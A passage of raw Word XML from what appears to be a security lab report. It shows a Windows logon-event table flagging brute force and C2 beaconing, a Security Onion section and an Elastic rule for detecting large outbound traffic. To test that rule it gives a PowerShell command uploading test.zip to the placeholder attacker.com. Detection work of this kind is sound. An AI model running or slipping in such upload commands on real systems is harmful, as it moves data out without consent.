          <w:p w14:paraId="5F9FF40D" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>4625</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1565" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1662785B" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2098" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AB00888" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3044" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E444291" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Suspicious DNS request after failed login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00594000" w:rsidRPr="00594000" w14:paraId="727FDC6E" w14:textId="77777777" w:rsidTr="00594000">
        <w:trPr>
          <w:trHeight w:val="710"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D53A2A4" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>2025-08-18 12:02:10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C931896" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>4625</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1565" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12231660" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2098" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="671E1938" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>45.76.23.110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3044" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08BA69F7" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Possible brute-force + beaconing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00594000" w:rsidRPr="00594000" w14:paraId="58A59120" w14:textId="77777777" w:rsidTr="00594000">
        <w:trPr>
          <w:trHeight w:val="689"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E384E8A" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>2025-08-18 12:03:44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4129D13C" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>4624</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1565" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4CC11C" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2098" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="279958F8" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>45.76.23.110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3044" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40F6D711" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Successful login → potential compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00594000" w:rsidRPr="00594000" w14:paraId="76B81E67" w14:textId="77777777" w:rsidTr="00594000">
        <w:trPr>
          <w:trHeight w:val="732"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FCBB2FF" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0CB4238E" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75C4BB80" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1565" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="175A1131" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2098" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="755249A8" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3044" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70E0AF75" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="035A29AC" w14:textId="776083C4" w:rsidR="00594000" w:rsidRDefault="00594000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>This correlation suggests brute-force attack followed by C2 communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28981EFE" w14:textId="3F76E47E" w:rsidR="00594000" w:rsidRDefault="00594000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Analyzing windows logs with security onion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1938EB0D" w14:textId="1BD248F1" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D250D3" wp14:editId="22899555">
            <wp:extent cx="2232561" cy="3035729"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129662288" name="Picture 2" descr="Introduction — Security Onion Documentation 2.4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 Security Onion Documentation 2.4 document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8181" cy="3056968"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="522364ED" w14:textId="71A5110C" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D1148C0" wp14:editId="71BEB8F1">
            <wp:extent cx="5201393" cy="3745879"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="200671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0537" cy="3752464"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E598C" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457ED22E" w14:textId="136C106C" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="675A3600" wp14:editId="3C06F3AB">
            <wp:extent cx="5736590" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133151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6590" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1611D" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0E78F3" w14:textId="7B5E0CFC" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38C0BA9F" wp14:editId="307A7FE8">
            <wp:extent cx="4619502" cy="4309383"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="454884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28567"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4626909" cy="4316293"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFB360" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D13BF2" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2966EE" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRPr="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Anomaly Detection Rule (Elastic Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785E9CC9" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRPr="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Create rule for large outbound traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1D38A" w14:textId="67603940" w:rsidR="009F3B11" w:rsidRPr="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">          Go to:</w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  Security → Rules → Create new rule → Custom query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7021896B" w14:textId="6E408637" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">      2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Rule Query:&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>network.bytes_out &gt; 1000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE1A63" w14:textId="42B22CC8" w:rsidR="009F3B11" w:rsidRPr="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Rule Name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>High Data Exfiltration Attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764EB96" w14:textId="3DF17399" w:rsidR="009F3B11" w:rsidRPr="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00F64E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Test the rule (Mock traffic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AEA219" w14:textId="33BA0561" w:rsidR="009F3B11" w:rsidRPr="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Use simple PowerShell command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7112CB1F" w14:textId="657C1ED0" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:t xml:space="preserve">powershell -command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41DD55" w14:textId="7A2970B3" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:t>(New-Object System.Net.WebClient).UploadFile('http://attacker.com','test.zip'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AF1E4C" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B26117" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016F064D" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA5AE35" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136AA413" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D032F4" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00455406" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062B3D1B" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7875B759" w14:textId="7EB523CC" w:rsidR="009F3B11" w:rsidRPr="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F64E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OUTPUT</w:t>
      </w:r>
      <w:r w:rsidRPr="009F3B11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Anomaly Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B6EB54" w14:textId="1CFF643A" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E520F3" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3648D6" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
